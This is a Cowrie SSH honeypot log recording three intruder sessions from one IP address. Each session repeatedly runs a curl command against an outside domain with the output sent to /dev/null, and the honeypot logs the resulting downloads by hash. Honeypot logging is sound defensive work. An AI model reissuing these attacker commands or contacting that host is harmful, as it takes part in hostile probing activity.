{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.380491Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.381954Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.382343Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.417885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.420132Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.422032Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.422729Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.426371Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.427831Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.430360Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.431511Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.435970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.440743Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.478340Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.479451Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.480032Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.483577Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.488804Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.489764Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.490902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.492728Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.493509Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.550984Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.551820Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.556694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.557623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.561560Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.562324Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.565223Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.593764Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.596852Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.602546Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.603286Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.605939Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.606761Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.611635Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.612546Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.616066Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.618808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.648084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.649943Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.651048Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.651958Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.655641Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.658597Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.660816Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.661233Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.663309Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.663875Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.694233Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.694982Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.698228Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.700768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.702256Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.702777Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.704528Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.705355Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.709915Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.733909Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.734704Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.738726Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.739349Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.742330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.743235Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.743846Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.746912Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.774982Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.776746Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.778000Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.778851Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.781781Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.784084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.784924Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.785541Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.788904Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.789688Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.819346Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.821084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.823449Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.824072Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
